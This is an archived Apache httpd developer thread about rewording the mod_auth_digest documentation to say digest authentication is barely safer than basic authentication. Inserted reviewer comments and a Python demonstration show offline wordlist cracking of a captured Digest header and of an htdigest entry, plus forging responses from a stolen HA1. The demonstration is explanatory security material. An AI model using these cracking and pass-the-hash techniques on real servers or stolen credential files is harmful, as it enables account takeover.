Posted to dev@httpd.apache.org by Stefan Fritsch <sf...@sfritsch.de> on 2013/12/30 17:58:45 UTC
digest auth is not really more secure than basic auth (Fwd: svn commit: r1554276 - /httpd/httpd/trunk/docs/manual/mod/mod_auth_digest.xml)
Does anyone disagree with the below change (not yet merged to 2.x
branches)? There is a similar paragraph in howto/auth.xml that I
intend to remove.
----------
Author: sf
Date: Mon Dec 30 16:49:31 2013
New Revision: 1554276
URL: http://svn.apache.org/r1554276
Log:
digest auth is only marginally more secure than basic auth.
Adjust the docs to today's reality.
Modified:
httpd/httpd/trunk/docs/manual/mod/mod_auth_digest.xml
Modified: httpd/httpd/trunk/docs/manual/mod/mod_auth_digest.xml
URL:
http://svn.apache.org/viewvc/httpd/httpd/trunk/docs/manual/mod/mod_auth_digest.xml?rev=1554276&r1=1554275&r2=1554276&view=diff
==============================================================================
--- httpd/httpd/trunk/docs/manual/mod/mod_auth_digest.xml (original)
+++ httpd/httpd/trunk/docs/manual/mod/mod_auth_digest.xml Mon Dec 30
16:49:31 2013
@@ -32,7 +32,11 @@
<summary>
<p>This module implements HTTP Digest Authentication
(<a href="http://www.faqs.org/rfcs/rfc2617.html">RFC2617</a>),
and
- provides a more secure alternative to
<module>mod_auth_basic</module>.</p>
+ provides an alternative to <module>mod_auth_basic</module> where
the
+ password is not transmitted as cleartext. However, the security
+ improvement over basic authentication is very small. Encrypting
the
+ whole connection using <module>mod_ssl</module> is a much better
+ alternative.</p>
</summary>
<seealso><directive
module="mod_authn_core">AuthName</directive></seealso>
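Review bot: the new summary text ("the security improvement over basic authentication is very small") states a conclusion with no reason, so a reader who only sees the module summary learns nothing about what is wrong; suggest naming the two failures the Note further down describes, e.g. "However, an active attacker can downgrade the client to basic authentication and a passive one can brute-force the MD5-based exchange offline, so the security improvement over basic authentication is very small." The phrase "the password is not transmitted as cleartext" is also only true of the wire; the replies in this thread point out that the value htdigest stores is a single MD5 and is by itself enough to authenticate, which the summary should mention once that text is added.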
@@ -70,9 +74,14 @@
</example>
<note><title>Note</title>
- <p>Digest authentication is more secure than Basic
authentication,
- but only works with supporting browsers. As of this writing
(December
- 2012) all major browsers support digest authentication.</p>
+ <p>Digest authentication was intended to be more secure than
basic
+ authentication, but no longer fulfills that design goal. A
+ man-in-the-middle attacker can trivially force the browser to
downgrade
+ to basic authentication. And even a passive eavesdropper can
brute-force
+ the password using today's graphics hardware, because the hashing
+ algorithm used by digest authentication is too fast. Therefore
+ using <module>mod_ssl</module> to encrypt the whole connection is
+ recommended.</p>
<p><module>mod_auth_digest</module> only works properly on
platforms
where APR supports shared memory.</p>
</note>
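Review bot: "using today's graphics hardware" in the new paragraph dates the text the same way the removed "(December 2012)" did; state the property rather than the era, e.g. "because the hashing algorithm used by digest authentication is a single round of MD5, which is fast to brute-force." The downgrade sentence should say how the downgrade happens (the attacker rewrites the WWW-Authenticate challenge from Digest to Basic on the unencrypted connection), since that is what makes encrypting the connection the remedy rather than a stronger hash. The paragraph also only covers the wire; the point raised in the replies, that the htdigest file holds one unsalted MD5 which can be brute-forced and used directly for authentication, is a third reason and belongs in this Note or in a separate one next to it.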
Re: svn commit: r1554276 - /httpd/httpd/trunk/docs/manual/mod/mod_auth_digest.xml
Posted by Stefan Fritsch <sf...@sfritsch.de>.
On Monday, 30 December 2013, 18:11:56, Reindl Harald wrote:
> On 30.12.2013 18:07, Graham Leggett wrote:
> > On 30 Dec 2013, at 6:58 PM, Stefan Fritsch <sf...@sfritsch.de> wrote:
> >> Does anyone disagree with the below change (not yet merged to 2.x
> >> branches)? There is a similar paragraph in howto/auth.xml that I
> >> intend to remove.
> >
> > I would say digest authentication is insecure because it (to my
> > knowledge) forces you to store the password in cleartext
>
> clearly no
>
> [harry@srv-rhsoft:~]$ htdigest --help
> Usage: htdigest [-c] passwordfile realm username
> The -c flag creates a new file.
>
> does *not* store plaintext passwords
True, but as with the hash transmitted over the wire, the hash used in
the digest file is just a single round of md5 which can easily be
brute-forced. Also, if the hashed string in the htdigest file is
known, one can use it for digest authentication without knowing the
real password.
The insecure password storage is definitely another reason not to use
digest auth. I will add that to the docs, too.
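The two points in this reply, that the htdigest entry is a single MD5 and that the entry alone is enough to authenticate, are easy to check. The following Python is an added example, not code from httpd or from anyone in this thread; the realm, user, password, nonce, cnonce and wordlist are constructed for the demonstration, and the server nonce is fixed so the run is deterministic. It builds an htdigest line and a captured Authorization header the way RFC 2617 (qop=auth) specifies, recovers the password from either one with a wordlist, and finally answers a challenge using only the stored HA1, never the password.

```python
import hashlib
import re

# Constructed values for this example (not from any real server, file or capture).
REALM = "Private"
USER = "alice"
PASSWORD = "hunter2"
NONCE = "dcd98b7102dd2f0e8b11d0f600bfb0c093"  # fixed here; a real server picks a fresh random nonce
CNONCE = "0a4f113b"
NC = "00000001"
WORDLIST = ["password", "letmein", "123456", "hunter2", "qwerty"]


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def ha1(user: str, realm: str, password: str) -> str:
    """HA1 = MD5(user:realm:password). This is exactly the value htdigest writes to disk."""
    return md5hex(f"{user}:{realm}:{password}")


def digest_response(ha1_hex, method, uri, nonce, nc, cnonce, qop="auth"):
    """RFC 2617 3.2.2.1 response for qop=auth. The input is HA1, never the password."""
    ha2 = md5hex(f"{method}:{uri}")
    return md5hex(f"{ha1_hex}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def htdigest_line(user, realm, password):
    """The line htdigest stores: user:realm:HA1 (one unsalted MD5, no work factor)."""
    return f"{user}:{realm}:{ha1(user, realm, password)}"


def client_authorization(user, realm, password, method, uri, nonce, nc, cnonce):
    """What a browser sends back after a Digest challenge with qop=auth."""
    resp = digest_response(ha1(user, realm, password), method, uri, nonce, nc, cnonce)
    return (f'Digest username="{user}", realm="{realm}", nonce="{nonce}", uri="{uri}", '
            f'qop=auth, nc={nc}, cnonce="{cnonce}", response="{resp}"')


def parse_authorization(header):
    """Minimal parser for the comma-separated k=v / k="v" list of a Digest header."""
    if not header.startswith("Digest "):
        raise ValueError("not a Digest Authorization header")
    fields = {}
    for m in re.finditer(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', header[len("Digest "):]):
        fields[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return fields


def crack_from_capture(header, method, wordlist):
    """Passive eavesdropper: everything but the password is in the captured header,
    so each guess costs two MD5 calls and is tested entirely offline."""
    f = parse_authorization(header)
    for guess in wordlist:
        h1 = ha1(f["username"], f["realm"], guess)
        if digest_response(h1, method, f["uri"], f["nonce"], f["nc"], f["cnonce"], f["qop"]) == f["response"]:
            return guess
    return None


def crack_from_htdigest(line, wordlist):
    """Stolen password file: one MD5 per guess, because HA1 has no random salt or stretching."""
    user, realm, stored = line.split(":", 2)
    for guess in wordlist:
        if ha1(user, realm, guess) == stored:
            return guess
    return None


def forge_with_stolen_ha1(line, method, uri, nonce, nc, cnonce):
    """Pass-the-hash: the htdigest entry alone answers any challenge for that user."""
    user, realm, stored = line.split(":", 2)
    return digest_response(stored, method, uri, nonce, nc, cnonce)


if __name__ == "__main__":
    line = htdigest_line(USER, REALM, PASSWORD)
    captured = client_authorization(USER, REALM, PASSWORD, "GET", "/secret", NONCE, NC, CNONCE)
    print("htdigest line  :", line)
    print("captured header:", captured)
    print("from capture   :", crack_from_capture(captured, "GET", WORDLIST))
    print("from htdigest  :", crack_from_htdigest(line, WORDLIST))
    forged = forge_with_stolen_ha1(line, "GET", "/secret", NONCE, NC, CNONCE)
    print("forged matches :", forged == parse_authorization(captured)["response"])
```

Both cracking loops are a plain wordlist walk; the point is only that each guess costs one or two MD5 computations with no salt and no iteration count, which is why a GPU cracker gets through large wordlists quickly. The forgery function shows the other consequence: whoever reads the htdigest file does not need to crack anything, because the stored HA1 is the only secret the protocol ever uses. Note that none of this depends on the nonce, which only prevents replay of one specific response.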
Re: svn commit: r1554276 - /httpd/httpd/trunk/docs/manual/mod/mod_auth_digest.xml
Posted by Reindl Harald <h....@thelounge.net>.
On 30.12.2013 18:07, Graham Leggett wrote:
> On 30 Dec 2013, at 6:58 PM, Stefan Fritsch <sf...@sfritsch.de> wrote:
>
>> Does anyone disagree with the below change (not yet merged to 2.x
>> branches)? There is a similar paragraph in howto/auth.xml that I
>> intend to remove.
>
> I would say digest authentication is insecure because it (to my knowledge)
> forces you to store the password in cleartext
clearly no
[harry@srv-rhsoft:~]$ htdigest --help
Usage: htdigest [-c] passwordfile realm username
The -c flag creates a new file.
does *not* store plaintext passwords
Re: digest auth is not really more secure than basic auth (Fwd: svn commit: r1554276 - /httpd/httpd/trunk/docs/manual/mod/mod_auth_digest.xml)
Posted by Graham Leggett <mi...@sharp.fm>.
On 30 Dec 2013, at 6:58 PM, Stefan Fritsch <sf...@sfritsch.de> wrote:
> Does anyone disagree with the below change (not yet merged to 2.x
> branches)? There is a similar paragraph in howto/auth.xml that I
> intend to remove.
I would say digest authentication is insecure because it (to my knowledge) forces you to store the password in cleartext. Encrypt the password at rest, encrypt over the wire with basic_auth+ssl.
Regards,
Graham
--